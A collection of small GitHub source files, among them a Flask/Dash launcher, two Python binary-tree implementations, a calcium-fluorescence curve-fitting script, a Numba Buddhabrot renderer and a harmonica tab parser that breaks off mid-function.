"source": "JoaoCarabetta/waze-dash",
"score": 2
} |
#### File: JoaoCarabetta/waze-dash/run_flask.py
```python
import argparse
from slapdash.app import app
def argparser():
parser = argparse.ArgumentParser()
parser.add_argument("--port", metavar="PORT", default=8050, type=int)
parser.add_argument("--host", metavar="HOST", default='0.0.0.0')
parser.add_argument('--debug', action='store_true')
parser.add_argument("--processes", metavar="PROCESSES", type=int, default=1)
parser.add_argument("--threaded", action='store_true')
return parser
def main():
args = argparser().parse_args()
app.server.run(
debug=args.debug,
host=args.host,
port=args.port,
processes=args.processes,
threaded=args.threaded,
)
if __name__ == '__main__':
main()
```
#### File: src/slapdash/__init__.py
```python
from flask import Flask
from dash import Dash
def create_app(config_object='{}.settings'.format(__package__)):
server = Flask(__package__)
# load default settings
server.config.from_object(config_object)
# load additional settings that will override the defaults in settings.py. eg
# $ export SLAPDASH_SETTINGS=/some/path/prod_settings.py
server.config.from_envvar('SLAPDASH_SETTINGS', silent=True)
return server
def create_dash(server):
app = Dash(server=server)
app.title = server.config['TITLE']
app.config.routes_pathname_prefix = server.config['ROUTES_PATHNAME_PREFIX']
# Suppress callback validation as we will be initialising callbacks that target
# element IDs that won't yet occur in the layout.
app.config.supress_callback_exceptions = True
return app
``` |
{
"source": "joao-carlos-eng/repo",
"score": 2
} |
#### File: joao-carlos-eng/repo/teste01.py
```python
def ola(fulano):
print(f"Olá {fulano} !")
if __name__ == "__main__":
ola("João")
``` |
{
"source": "joaocarlos-losfe/pysimpletree",
"score": 4
} |
#### File: pysimpletree/pysimpletree/binarytree.py
```python
import pickle
class No:
def __init__(self, chave, no_esquerdo, no_direito):
self.chave = chave
self.no_esquerdo = no_esquerdo
self.no_direito = no_direito
def exibir_chave(self):
print(self.chave)
class BinaryTree:
def __init__(self) -> None:
self.raiz = None
self.__total_nos:int = 0
self.array = []
def inserir_chave(self, chave):
"""
insere uma nova chave na árvore.
Parametros obrigatorios: chave a ser inserida
"""
novo_no = No(chave, None, None)
if self.raiz == None:
self.raiz = novo_no
self.__total_nos += 1
else:
no_atual = self.raiz
while True:
no_anterior = no_atual
if chave <= no_atual.chave:
no_atual = no_atual.no_esquerdo
if no_atual == None:
no_anterior.no_esquerdo = novo_no
self.__total_nos += 1
return
else:
no_atual = no_atual.no_direito
if no_atual == None:
no_anterior.no_direito = novo_no
self.__total_nos += 1
return
def get_total_nos(self) -> int:
"""
retorna a quantidade de nós da árvore
"""
return self.__total_nos
def pre_ordem(self, raiz:No):
"""
imprime os elementos da árvore em pre ordem.
Parametros obrigatorios: 'instancia.raiz'
"""
if raiz is not None:
raiz.exibir_chave()
self.em_ordem(raiz.no_esquerdo)
self.em_ordem(raiz.no_direito)
def em_ordem(self, raiz:No):
"""
imprime os elementos da árvore em ordem.
Parametros obrigatorios: 'instancia.raiz'
"""
if raiz is not None:
self.pre_ordem(raiz.no_esquerdo)
raiz.exibir_chave()
self.pre_ordem(raiz.no_direito)
def pos_ordem(self, raiz:No):
"""
imprime os elementos da árvore em pós ordem.
Parametros obrigatorios: 'instancia.raiz'
"""
if raiz is not None:
self.pos_ordem(raiz.no_esquerdo)
self.pos_ordem(raiz.no_direito)
raiz.exibir_chave()
def altura(self, raiz:No) -> int:
"""
retorna a altura maxima da árvore.
Parametros obrigatorios: 'instancia.raiz'
"""
if raiz is None:
return - 1
else:
altura_esquerda = self.altura(raiz.no_esquerdo)
altura_direita = self.altura(raiz.no_direito)
if altura_esquerda < altura_direita:
return altura_direita + 1
else:
return altura_esquerda + 1
def buscar_elemento(self, chave) -> No:
"""
retorna um no da arvore caso o elemento a ser procurado exista. caso contrario retorna None.
Parametros obrigatorios: chave a ser procurada
"""
if self.raiz == None:
return None
else:
no_atual = self.raiz
while chave != no_atual.chave:
if chave < no_atual.chave:
no_atual = no_atual.no_esquerdo
else:
no_atual = no_atual.no_direito
if self.eh_folha(no_atual):
return None
return no_atual
def eh_folha(self, no: No) -> bool:
"""
verifica se um elemento da arvore é folha.
retorna True caso seja e False caso contrario.
parametros obrigatorios: um nó da arvore
"""
if no is not None:
if no.no_esquerdo == None and no.no_direito == None:
return True
return False
def no_sucessor(self, apagar:No):
pai_no_sucessor:No = apagar
no_sucessor:No = apagar
no_atual:No = apagar.no_direito
while no_atual != None:
pai_no_sucessor = no_sucessor
no_sucessor = no_atual
no_atual = no_atual.no_esquerdo
if no_sucessor != apagar.no_direito:
pai_no_sucessor.no_esquerdo = no_sucessor.no_direito
no_sucessor.no_direito = apagar.no_direito
return no_sucessor
def remover_chave(self, chave):
"""
apaga um nó da arvore.
paramentros obrigatorios: a chave que deseja remover
retorna True caso a chave seja encontrada. Caso contrario, retorna False
"""
if self.raiz == None:
return False
no_atual = self.raiz
no_pai = self.raiz
existe_filho_esquerdo = True
while no_atual.chave != chave:
no_pai = no_atual
if chave < no_atual.chave:
no_atual = no_atual.no_esquerdo
existe_filho_esquerdo = True
else:
no_atual = no_atual.no_direito
existe_filho_esquerdo = False
if no_atual == None:
return False
if no_atual.no_esquerdo == None and no_atual.no_direito == None:
if no_atual == self.raiz:
self.raiz = None
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = None
else:
no_pai.no_direito = None
elif no_atual.no_direito == None:
if no_atual == self.raiz:
self.raiz = no_atual.no_esquerdo
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_atual.no_esquerdo
else:
no_pai.no_direito = no_atual.no_esquerdo
elif no_atual.no_esquerdo == None:
if no_atual == self.raiz:
self.raiz = no_atual.no_direito
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_atual.no_direito
else:
no_pai.no_direito = no_atual.no_direito
else:
no_sucessor = self.no_sucessor(no_atual)
if no_atual == self.raiz:
self.raiz = no_sucessor
else:
if existe_filho_esquerdo:
no_pai.no_esquerdo = no_sucessor
else:
no_pai.no_direito = no_sucessor
no_sucessor.no_esquerdo = no_atual.no_esquerdo
return True
def ler_arvore_do_arquivo(self, raiz:No, path:str, nome_arquivo:str):
"""
Parametros obrigatorios: 'instancia.raiz',
path: caminho de onde deseja ler o arquivo;
nome_arquivo: nome do arquivo a ser lido;
"""
print("carregando arquivo...")
try:
arquivo = open(path+"/"+nome_arquivo, 'rb')
self.array = pickle.load(arquivo)
arquivo.close()
if len(self.array) > 0 :
for chave in self.array:
self.inserir_chave(chave)
self.array.clear()
print("carregado com sucesso...")
return True
except:
print("erro ao ler arquivo. verifique o path e nome do arquivo")
return False
def _prencher_array(self, raiz:No):
if raiz is not None:
self.array.append(raiz.chave)
self._prencher_array(raiz.no_esquerdo)
self._prencher_array(raiz.no_direito)
if len(self.array) > 0:
return True
return False
def salvar_arvore_no_arquivo(self, raiz:No, path:str, nome_arquivo:str):
"""
Parametros obrigatorios: 'instancia.raiz'.
path: caminho onde deseja salvar o arquivo;
nome_arquivo: nome que desenja dar ao arquivo;
"""
if self._prencher_array(raiz):
try:
arquivo = open(path+"/"+nome_arquivo, 'wb')
pickle.dump(self.array, arquivo)
arquivo.close()
self.array.clear()
print("arvore salva com sucesso..")
return True
except:
print("erro ao ler arquivo. verifique o path e nome do arquivo")
return False
"""
import os
arvore = BinaryTree()
arvore.ler_arvore_do_arquivo(arvore.raiz, "C:/Users/joaoc/Documents/UFPI/POO2/Criação de pacotes em python/pysimpletree/arquivo_arvore", "arquivo_arvore")
arvore.pre_ordem(arvore.raiz)
path = os.getcwd()
arvore.salvar_arvore_no_arquivo(arvore.raiz, os.getcwd(), "arquivo_arvore")
arvore.inserir_chave(5)
arvore.inserir_chave(6)
arvore.inserir_chave(7)
arvore.inserir_chave(4)
arvore.inserir_chave(3)
arvore.inserir_chave(8)
arvore.remover_chave(6)
arvore.remover_chave(4)
arvore.remover_chave(5)
arvore.em_ordem(arvore.raiz)
"""
"""
print("\ntotal de nós da arvore: " + str(arvore.get_total_nos()))
print("\naltura da arvore: " + str(arvore.altura(arvore.raiz)))
dado = arvore.buscar_elemento(7)
if dado != None:
print("elemento encontrado: " + str(dado.chave))
else:
print("elemento não encontrado")
arvore.remover_chave(3)
arvore.remover_chave(7)
arvore.em_ordem(arvore.raiz)
print(arvore.array)
"""
``` |
{
"source": "joaocarmo/calcium",
"score": 3
} |
#### File: joaocarmo/calcium/calcium.py
```python
from __future__ import division
from scipy import stats
from scipy.integrate import quad
from scipy.integrate import simps
import csv
import numpy as np
import matplotlib.pyplot as plt
# --- SETTINGS START --- #
# Show data plots
showPlots = True
# Data sorce
data = 'data_calcium_handling.csv'
# Ignore the first X data points from the source
start = 7
# Where to cutoff the data points for the analysis
cutoff = 25
# ---- SETTINGS END ---- #
# Arrays to hold the raw data
x1 = []
x2 = []
x3 = []
x4 = []
sec = []
# Read the source and pass it to the arrays
with open(data, 'rb') as f:
reader = csv.reader(f)
for row in reader:
x1.append(row[0])
x2.append(row[1])
x3.append(row[2])
x4.append(row[3])
sec.append(row[4])
x1_s = x1[start:]
x2_s = x2[start:]
x3_s = x3[start:]
x4_s = x4[start:]
sec_s = sec[start:]
# New arrays for the treated data
avg_x = []
time = []
# Populate the arrays with the Mean of x1, x2, x3 and x4
for i in range(len(x1_s)):
avg_x.append( np.mean( [ float(x1_s[i]), float(x2_s[i]), float(x3_s[i]), float(x4_s[i]) ] ) )
time.append( float(sec_s[i]) )
# Interpolate as a 3rd degree polinomial
z = np.polyfit(time, avg_x, 3)
p = np.poly1d(z)
avg_fit = p(time)
# Interpolate the first X data points as log f = A + B log t
log_avg_x = np.log(avg_x[:cutoff])
log_time = np.log(time[:cutoff])
slope, intercept, r_value, p_value, std_err = stats.linregress(log_time, log_avg_x)
p2 = np.poly1d([slope, intercept])
avg_log_fit = p2(log_time)
r2_value = r_value ** 2
# Get the value of A from ln A and of B from the slope
A = np.exp(intercept)
B = slope
def f(t):
return A * t ** B
# Integrate the interpolated function
I = quad(f, time[0], time[cutoff])
# Integrate using the data
I_data = simps(avg_x[:cutoff], time[:cutoff])
# Calculate the total area of the rectangle
height = avg_x[0]
width = time[cutoff] - time[0]
total_area = height * width
# Get the differences
diff_I = total_area - I[0]
diff_I_data = total_area - I_data
# Print out the results to the console
print '\nfirst point (' + str(avg_x[0]) + ', ' + str(time[0]) + ')' + '\nlast point (' + str(avg_x[cutoff]) + ', ' + str(time[cutoff]) + ')\n\n'
print '\nlog f(t) = ln A + B x log t\n' + '\nA = ' + str(A) + '\nB = ' + str(slope) + '\nR2 = ' + str(r2_value) + '\n\n'
print '\nthe integral of f(t) = ' + str(A) + ' x t ^ ' + str(B) + '\nfrom ' + str(time[0]) + 's to ' + str(time[cutoff]) + 's is\n\nI-func = ' + str(I[0]) + '\n\n'
print '\nthe numerical integral of the data from the first point to the last is\n\nI-data = ' + str(I_data) + '\n\n'
print '\nthe total area of the rectangle which includes the\nfirst and last points as vertices is\n\nArea = ' + str(total_area) + '\n\n'
print '\nthe difference in area - integral is, respectively\n\nArea - I-func = ' + str(diff_I) + '\nArea - I-data = ' + str(diff_I_data) + '\n\n'
# Plot the graph figures
if showPlots:
fig1 = plt.figure(1)
plt.plot(time, avg_x, 'bx', time, avg_fit, 'r--')
plt.xlabel('time (s)')
plt.ylabel('fluorescence (rfu)')
plt.title('Data with a 3rd degree polynomial fit')
fig2 = plt.figure(2)
plt.plot(log_time, log_avg_x, 'bx', log_time, avg_log_fit, 'r--')
plt.xlabel('log time (s)')
plt.ylabel('log fluorescence (rfu)')
plt.title('Data on a logarithmic scale with a linear fit')
fig3 = plt.figure(3)
plt.plot(time, avg_x, 'bx', time[:cutoff], f(time[:cutoff]), 'r--')
plt.xlabel('time (s)')
plt.ylabel('fluorescence (rfu)')
plt.title('Data with the linear fit')
plt.show()
``` |
{
"source": "joaocarvalhoopen/Binary_Tree_in_Python",
"score": 4
} |
#### File: joaocarvalhoopen/Binary_Tree_in_Python/binary_tree.py
```python
import queue # For bredth first traversal.
# Child tree node.
class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
class BinaryTree:
TRAVERSAL_DEPTH_FIRST_PRE_ORDER = 0
TRAVERSAL_DEPTH_FIRST_IN_ORDER = 1
TRAVERSAL_DEPTH_FIRST_POST_ORDER = 2
TRAVERSAL_BREADTH_FIRST_ORDER = 3
COUNT = 10
def __init__(self):
self.root = None
self.length = 0
def __len__(self):
return self.length
def is_empty(self):
if self.length == 0:
return True
else:
return False
# Internal
def _contains_recursive(self, curr_node, data):
if curr_node == None:
return False
elif curr_node.data == data:
return True
elif data < curr_node.data:
return self._contains_recursive(curr_node.left, data)
else:
return self._contains_recursive(curr_node.right, data)
# Top level.
def __contains__(self, data):
return self._contains_recursive(self.root, data)
# Internal
def _insert_recursive(self, curr_node, data):
if curr_node == None:
self.length += 1
return Node(data)
elif data < curr_node.data:
curr_node.left = self._insert_recursive(curr_node.left, data)
elif curr_node.data < data:
curr_node.right = self._insert_recursive(curr_node.right, data)
return curr_node
# Top level.
def insert(self, data):
self.root = self._insert_recursive(self.root, data)
# Internal
def _min_data(self, curr_node):
if(curr_node.left() != None):
return self._min_data(curr_node.left)
else:
return curr_node.data
# Internal
def _delete_recursive(self, curr_node, data):
if curr_node == None:
return None
elif curr_node.data == data:
# No child node.
if (curr_node.left == None) and (curr_node.right == None):
self.length -= 1
return None
# One child left.
elif curr_node.right == None:
self.length -= 1
return curr_node.left
# One child rigth.
elif curr_node.left == None:
self.length -= 1
return curr_node.right
# Two children.
else:
self.length -= 1
minData = self._min_data(curr_node.right)
curr_node.data = minData
curr_node.right = self._delete_recursive(curr_node.right, minData)
return curr_node
elif data < curr_node.data:
curr_node.left = self._delete_recursive(curr_node.left, data)
return curr_node
else:
curr_node.right = self._delete_recursive(curr_node.right, data)
return curr_node
# Top level
def __delitem__(self, data):
self.root = self._delete_recursive(self.root, data)
# Internal
def _traversal_depth_first_pre_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
self._traversal_depth_first_pre_order(curr_node.left, lst, apply_func)
self._traversal_depth_first_pre_order(curr_node.right, lst, apply_func)
# Internal
def _traversal_depth_first_in_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
self._traversal_depth_first_in_order(curr_node.left, lst, apply_func)
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
self._traversal_depth_first_in_order(curr_node.right, lst, apply_func)
# Internal
def _traversal_depth_first_post_order(self, curr_node, lst, apply_func=None):
if curr_node == None:
return
else:
self._traversal_depth_first_post_order(curr_node.left, lst, apply_func)
self._traversal_depth_first_post_order(curr_node.right, lst, apply_func)
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
# Internal
def _traversal_breadth_first_order(self, curr_node, lst, apply_func=None):
if self.root == None:
return
q = queue.Queue()
q.put(self.root)
while(not q.empty()):
curr_node = q.get()
if apply_func == None:
lst.append(curr_node.data)
else:
apply_func(curr_node.data)
if curr_node.left != None:
q.put(curr_node.left)
if curr_node.right != None:
q.put(curr_node.right)
def _prepare_correct_func(self, order):
retFunc = None
if order == self.TRAVERSAL_DEPTH_FIRST_PRE_ORDER:
retFunc = self._traversal_depth_first_pre_order
elif order == self.TRAVERSAL_DEPTH_FIRST_IN_ORDER:
retFunc = self._traversal_depth_first_in_order
elif order == self.TRAVERSAL_DEPTH_FIRST_POST_ORDER:
retFunc = self._traversal_depth_first_post_order
elif order == self.TRAVERSAL_BREADTH_FIRST_ORDER:
retFunc = self._traversal_breadth_first_order
else:
raise AttributeError("Order not recognised!")
return retFunc
# Top level.
def to_list(self, order = TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
lst = []
curr_node = self.root
runFunc = self._prepare_correct_func(order)
runFunc(curr_node, lst, apply_func=None)
return lst
# Top level.
def apply_func(self, apply_func, order = TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
lst = []
curr_node = self.root
run_func = self._prepare_correct_func(order)
run_func(curr_node, lst, apply_func)
return lst
def __iter__(self): # iterate over all keys
# Note: This first version ineficient because it needs to create a list before iterating.
for x in self.to_list(order=self.TRAVERSAL_DEPTH_FIRST_PRE_ORDER):
yield x
# Note: This second version eficient.
# It doesn't create a temporary list previous to execution.
# But it doesn't work!!!
# Rat's and double rat's!
# self.apply_func(apply_func=lambda elem: (yield elem), order=self.TRANSVERSAL_DEPTH_FIRST_PRE_ORDER)
# Internal
def _draw_tree_2D_recursive(self, curr_node, space):
if curr_node == None:
return
# Increment space between levels.
space += self.COUNT
self._draw_tree_2D_recursive(curr_node.right, space)
# Print spaces then the node data.
print("\n", end="")
for i in range(self.COUNT, space):
print(" ", end='')
print(curr_node.data)
self._draw_tree_2D_recursive(curr_node.left, space)
# Top level
def draw_tree_2D(self):
# Initial space is zero.
self._draw_tree_2D_recursive(self.root, space = 0)
def _balance_tree_recursive(self, nodes_lst, start_index, end_index):
# Stop condition.
if start_index > end_index:
return None
# Get middle element.
mid_index = (start_index + end_index) // 2
curr_node = Node(nodes_lst[mid_index])
# By using the index of inorder traversal the subtree nodes
# to the left and to the righ are created.
curr_node.left = self._balance_tree_recursive(nodes_lst, start_index, mid_index-1)
curr_node.right = self._balance_tree_recursive(nodes_lst, mid_index+1, end_index)
return curr_node
# Top level.
# Balance an unbalanded tree.
def balance_tree(self):
nodes_lst = self.to_list()
nodes_lst.sort()
# Creates the balanced binary tree from nodes list.
n = len(nodes_lst)
self.root = self._balance_tree_recursive(nodes_lst, 0, n-1)
###############
# Unit test's #
###############
def test_01(res_lst):
# Test 01
print("\nRunning test 01....\n")
ok = True
tree_01 = BinaryTree()
if tree_01.is_empty() == False:
ok = False
print("Error: In test 01 isEmpty().")
tree_01.insert(1)
if tree_01.is_empty() == True:
ok = False
print("Error: In test 01 isEmpty().")
print("BinaryTree: ", tree_01.to_list())
res_lst.append(ok)
if ok == True:
print("...Test 01 PASSED.")
def test_02(res_lst):
# Test 02
print("\nRunning test 02....\n")
ok = True
tree_02 = BinaryTree()
for i in [0,1,2,3,4]:
tree_02.insert(i)
if len(tree_02) != 5:
ok = False
print("Error: In test 02 insert() or len().")
if not (0 in tree_02 and
1 in tree_02 and
2 in tree_02 and
3 in tree_02 and
4 in tree_02 ) or not ( all( x in tree_02 for x in [0, 1, 2, 3, 4] ) ):
ok = False
print("Error: In test 02 insert() or contains().")
print("BinaryTree: ", tree_02.to_list())
res_lst.append(ok)
if ok == True:
print("...Test 02 PASSED.")
def test_03(res_lst):
# Test 03
print("\nRunning test 03....\n")
ok = True
tree_03 = BinaryTree()
for i in [0,1,2,3,4]:
tree_03.insert(i)
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_00 = len(tree_03)
del tree_03[1]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_01 = len(tree_03)
del tree_03[4]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_02 = len(tree_03)
del tree_03[3]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_03 = len(tree_03)
del tree_03[2]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_04 = len(tree_03)
del tree_03[0]
print("BinaryTree: ", tree_03.to_list())
tree_03.draw_tree_2D()
len_05 = len(tree_03)
print(len_05)
if (len_00 != (len_01 + 1)) or (len_00 != (len_02 + 2)) or (len_00 != (len_03 + 3)) or (len_00 != (len_04 + 4)) or (len_00 != (len_05 + 5)):
ok = False
print("Error: In test 03 del().")
res_lst.append(ok)
if ok == True:
print("...Test 03 PASSED.")
def test_04(res_lst):
# Test 04
print("\nRunning test 04....\n")
ok = True
tree_04 = BinaryTree()
for i in [0,3,2,1,4]:
tree_04.insert(i)
print("BinaryTree: ", tree_04.to_list())
tree_04.draw_tree_2D()
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
target_lst = [0, 3, 2, 1, 4]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_IN_ORDER)
target_lst = [0, 1, 2, 3, 4]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_IN_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_POST_ORDER)
target_lst = [1, 2, 4, 3, 0]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_DEPTH_FIRST_POST_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
lst = tree_04.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
target_lst = [0, 3, 2, 4, 1]
if lst != target_lst:
ok = False
print("Error: In test 04 to_list() TRAVERSAL_BREADTH_FIRST_ORDER.")
print("to_list() : ", lst)
print("to_list() target: ", target_lst)
res_lst.append(ok)
if ok == True:
print("...Test 04 PASSED.")
def test_05(res_lst):
# Test 05
print("\nRunning test 05....\n")
ok = True
tree_05 = BinaryTree()
for i in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 14]:
tree_05.insert(i)
print("BinaryTree: ", tree_05.to_list())
tree_05.draw_tree_2D()
lstInitial = tree_05.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
tree_05.balance_tree()
tree_05.draw_tree_2D()
lst_after_being_balanced = tree_05.to_list(order = BinaryTree.TRAVERSAL_BREADTH_FIRST_ORDER)
target_lst = [7, 3, 11, 1, 5, 9, 13, 0, 2, 4, 6, 8, 10, 12, 14]
if (lstInitial != lst_after_being_balanced) and (lst_after_being_balanced != target_lst):
ok = False
print("Error: In test 05 balance_tree() TRAVERSAL_BREADTH_FIRST_ORDER.")
print("to_list() : ", lst_after_being_balanced)
print("to_list() target: ", target_lst)
res_lst.append(ok)
if ok == True:
print("...Test 05 PASSED.")
# A clouser - This is a hack to have access to an object inside a function by only calling a function.
def my_func(my_list_object):
return lambda elem : my_list_object.append(elem)
def test_06(res_lst):
# Test 06
print("\nRunning test 06....\n")
ok = True
tree_06 = BinaryTree()
for i in [0,3,2,1,4]:
tree_06.insert(i)
print("BinaryTree: ", tree_06.to_list())
tree_06.draw_tree_2D()
lst_01 = tree_06.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("to_list() target: ", lst_01)
# This uses the clousure hack, to generate a list by calling the append method of a list like a function.
lst_from_outside = []
apply_func_my_obj = my_func(lst_from_outside)
tree_06.apply_func(apply_func=apply_func_my_obj, order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("apply_func(): ", lst_from_outside, " lst_from_outside")
# Only print's to the screen.
print("begin apply_func() print...")
apply_func_my_func = print
tree_06.apply_func(apply_func=apply_func_my_func, order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("...end apply_func() print.")
if lst_01 != lst_from_outside:
ok = False
print("Error: In test 06 apply_func() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
print("apply_func(): ", lst_from_outside)
print("to_list() target: ", lst_01)
res_lst.append(ok)
if ok == True:
print("...Test 06 PASSED.")
def test_07(res_lst):
# Test 07
print("\nRunning test 07....\n")
ok = True
tree_07 = BinaryTree()
for i in [0,3,2,1,4]:
tree_07.insert(i)
print("BinaryTree: ", tree_07.to_list())
lst_01 = tree_07.to_list(order = BinaryTree.TRAVERSAL_DEPTH_FIRST_PRE_ORDER)
print("to_list() target: ", lst_01)
lst_02 = []
for elem in tree_07:
lst_02.append(elem)
print("For __iter__(): ", lst_02)
lst_03 = [elem for elem in tree_07]
print("List comprehension __iter__(): ", lst_03)
if lst_01 != lst_02 and lst_01 != lst_03:
ok = False
print("Error: In test 07 __iter__() TRAVERSAL_DEPTH_FIRST_PRE_ORDER.")
res_lst.append(ok)
if ok == True:
print("...Test 07 PASSED.")
def runTests():
res = []
test_01(res)
test_02(res)
test_03(res)
test_04(res)
test_05(res)
test_06(res)
test_07(res)
if all(res):
print("\n** PASSED ALL TESTS! **")
if __name__ == "__main__":
print("Start running tests to BinaryTree....\n\n")
runTests()
print("\n...Finished running tests to BinaryTree....")
# Google Python Naming Conventions:
# module_name, package_name, ClassName, method_name, ExceptionName, function_name,
# GLOBAL_CONSTANT_NAME, global_var_name, instance_var_name, function_parameter_name, local_var_name
``` |
{
"source": "joaocarvalhoopen/Fractal_Buddhabrot",
"score": 3
} |
#### File: joaocarvalhoopen/Fractal_Buddhabrot/Buddhabrot.py
```python
import multiprocessing
from numba import prange, jit
import numba
import numpy as np
import random
from PIL import Image
import time
# Iterate the Mandelbrot and return TRUE if the point escapes
#@jit(nogil= True, nopython=True, locals={'x': numba.float32, 'y': numba.float32, 'xnew': numba.float32, 'ynew': numba.float32, 'i': numba.int32, 'n': numba.int32})
@jit
def iterate(x0, y0, n, seq_x, seq_y, NMAX):
x = 0.0
y = 0.0
n = 0
for i in range(0, NMAX):
xnew = x * x - y * y + x0
ynew = 2 * x * y + y0
# seq[i].x = xnew;
seq_x[i] = xnew
seq_y[i] = ynew
if (xnew*xnew + ynew*ynew ) > 10:
n = 1
return((True, i))
x = xnew
y = ynew
return((False, -1))
def write_image(filename, image_array, width, height):
# Find the largest and the lowest density value
biggest = np.amax(image_array)
smallest = np.amin(image_array)
print("Density value range: " + str(smallest) + " to " + str(biggest))
# Write the image
# Raw uncompressed bytes
im = Image.new("RGB", (width, height))
pix = im.load()
for x in range(width):
for y in range(height):
ramp = 2*( image_array[x][y] - smallest) / (biggest - smallest)
if (ramp > 1):
ramp = 1
ramp = ramp**0.5
pix[x,y] = (int(ramp*255), int(ramp*255), int(ramp*255))
im.save(filename, "PNG")
#@jit(locals={'x': numba.float32, 'y': numba.float32, 'n': numba.int32, 'ix': numba.int32, 'iy': numba.int32, 'i': numba.int32 })
@jit
def buddhabrot(NX, NY, NMAX, TMAX):
image_out = np.zeros((NX,NY), dtype=np.float32)
# xy_seq = [(0.0,0.0) for x in range(0, NMAX)]
xy_seq_x = np.zeros(NMAX, dtype=np.float32)
xy_seq_y = np.zeros(NMAX, dtype=np.float32)
n = 0
NX_2 = NX / 2
NY_2 = NY / 2
NX_3 = 0.3 * NX
NY_3 = 0.3 * NY
rnd = np.zeros((TMAX * 2), dtype='f')
#for tt in prange(0, 1000000):
for tt in range(0, 1000000):
if (tt%1000 == 0):
print('iteration ' + str(tt))
#rnd = np.random.rand(TMAX*2)
rnd[:] = np.random.rand(*rnd.shape)
for t in range(0, TMAX):
# Choose a random point in same range.
# x = 6 * random.random() - 3
# y = 6 * random.random() - 3
#x = 6 * np.random.rand() - 3
#y = 6 * np.random.rand() - 3
x = 6 * rnd[t*2] - 3
y = 6 * rnd[t*2+1] - 3
# Determine state of this point, draw if it escapes
ret_val, n_possible = iterate(x, y, n, xy_seq_x, xy_seq_y, NMAX)
if (ret_val):
n = n_possible
for i in range(0, n):
seq_x = xy_seq_x[i]
seq_y = xy_seq_y[i]
#ix = int(0.3 * NX * (seq_x + 0.5) + NX / 2);
#iy = int(0.3 * NY * seq_y + NY / 2);
ix = int(NX_3 * (seq_x + 0.5) + NX_2);
iy = int(NY_3 * seq_y + NY_2);
if ((ix >= 0) and (iy >= 0) and (ix < NX) and (iy < NY)):
image_out[iy][ix] += 1
# Write iamge.
write_image("buddhabrot_single.png", image_out, NX, NY);
# Image size.
c_NX = 1000
c_NY = 1000
# Lenght of the sequence to test escape status.
# Also known as bailout
c_NMAX = 200
# Number of iterations, multiple of 1 million.
c_TMAX = 10 # 100 # 2000 #1000 # 100
print('CPU_Number: ' + str(multiprocessing.cpu_count()))
start_time = time.time()
buddhabrot(c_NX, c_NY, c_NMAX, c_TMAX)
elapsed_time = time.time() - start_time
print("Elapsed time" + str(elapsed_time))
``` |
{
"source": "joaocarvalhoopen/Harmonica__The_good_kind_of_feedback",
"score": 4
} |
#### File: joaocarvalhoopen/Harmonica__The_good_kind_of_feedback/music_file_parser.py
```python
import re
tab_const_note_duration = 1
def parser_tab_simple_music_file(filename):
""" Input: Only the name of the file_path.
Structure of the return.
list_holes = ( note_name, int(hole_final), tab_const_note_duration, blow_draw, bending_type )
music_score = ('.tab', filename, title, key, list_holes )
return music_score
"""
#filename_path = get_music_directory() + filename
filename_path = filename
data_lines = []
# Open the file for reading but closes automatically the file, even in the case of exception!
with open(filename_path, "r") as file:
data_lines = file.readlines()
if len(data_lines) <= 3:
return ('ERRO', 'Error parsing file, the must be at least 3 lines in the file!' )
# TODO: Check if the last [1] of the following lines doesn't give an ERROR in the case it doesn't exist a string
# after the ':' in the file ".tab" .
# Reads the title and the key of the harmonica.
# Note: We are presumming that the order of the file is always the same!
title = data_lines[0].split(':')[1]
key = data_lines[1].split(':')[1]
list_holes = []
# print(data_lines)
line_num = 2
for line in data_lines[2:]:
# print(line)
# It has a comment simbol, and it ignores lines started with it so that we can have lyrics in the tab files.
if line.startswith('#'):
line_num += 1
continue
# Ignores the lines that only have white spaces or tabs.
line_tmp = line.lstrip()
if line_tmp == '\n' or line_tmp == '\r\n' or line_tmp == '':
# Note: In this point we can have 2 different types of symbol for ending a line in the file.
# One for Windows and other for Linux, '\r\n' and '\n', there is one lib that is dependent of the OS
# to obtain wich of this line terminators is the correct for our OS!
# I ignore also the empty lines.
line_num += 1
continue
# Remove ending line caracter '\r\n' or '\n'.
if line.endswith('\r\n'):
line = line[:-2]
elif line.endswith('\n'):
line = line[:-1]
line= line.rstrip()
line = line.lstrip()
# Remove the duplicate spaces between the holes in the tablature for
# every line.
line = re.sub(' +', ' ', line)
line = re.sub('\t+', ' ', line)
